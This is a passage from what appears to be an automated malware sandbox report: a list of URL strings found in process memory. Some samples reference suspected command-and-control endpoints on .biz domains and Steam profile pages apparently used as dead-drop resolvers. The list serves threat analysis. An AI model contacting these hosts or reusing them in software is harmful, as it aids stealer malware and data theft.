Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000019.00000003.2382744868.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2740227086.00006AE4000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378757374.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377308917.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742968890.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2379362869.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2814336252.00006AE400EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806448175.00006AE400788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744752570.00006AE4004B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000019.00000002.2814336252.00006AE400EAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000019.00000002.2814336252.00006AE400EAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806448175.00006AE400788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744752570.00006AE4004B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806448175.00006AE400788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744752570.00006AE4004B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381619665.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381694920.00006AE400F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000019.00000002.2741614802.00006AE40020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000019.00000002.2815909454.00006AE4010F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://og.google.com
Source: chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000019.00000002.2815909454.00006AE4010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2739460062.00006AE400054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808912500.00006AE400A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2815730834.00006AE4010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2747791390.00006AE4006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436422236.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000019.00000003.2435309994.00006AE4013A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434505606.00006AE401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434533303.00006AE4012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434420530.00006AE401434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434879439.00006AE4013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434457552.00006AE40143C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812413211.00006AE400D65000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2817002634.00006AE4013BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381619665.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381694920.00006AE400F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000019.00000003.2394026939.00006AE401130000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: chrome.exe, 00000019.00000002.2808260376.00006AE4009B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381619665.00006AE400E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2381694920.00006AE400F6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://print-vexer.biz/api
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://print-vexer.biz/apiz
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000019.00000002.2812958326.00006AE400DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000019.00000002.2812958326.00006AE400DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000019.00000002.2812958326.00006AE400DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: chrome.exe, 00000019.00000002.2739778208.00006AE40007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/3c
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/8c
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.0000000001483000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/api
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.0000000001483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/api(
Source: 3b636bd67f.exe, 00000013.00000003.2193344346.0000000001483000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/api=Z
Source: a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/c
Source: a629a70424.exe, 00000018.00000003.2809304370.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://se-blurry.biz/q
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000019.00000002.2806733327.00006AE40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806626138.00006AE4007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811325321.00006AE400C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744821200.00006AE4004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000019.00000002.2806733327.00006AE40080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: chrome.exe, 00000019.00000003.2401882661.00006AE400ED4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2434395484.00006AE400298000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000019.00000002.2744160805.00006AE400428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2436731682.00006AE401460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2435246761.00006AE401384000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, vmwin.exe, 0000001D.00000002.2710996354.0000000003281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: BlueMail.exe, 0000000E.00000002.2328768604.0000000005E90000.00000004.08000000.00040000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Gxtuum.exe, 00000016.00000002.2789644908.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/;
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E13000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2862333493.0000000000E13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/AA
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/E
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2848051422.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900$
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900%Z
Source: 3b636bd67f.exe, 00000013.00000003.2243621187.00000000014B0000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.00000000014B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900Oc
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900S
Source: c2bea0d661.exe, c2bea0d661.exe, 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, c2bea0d661.exe, 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927
Source: c2bea0d661.exe, 00000011.00000003.2161485786.0000000000B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2848051422.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
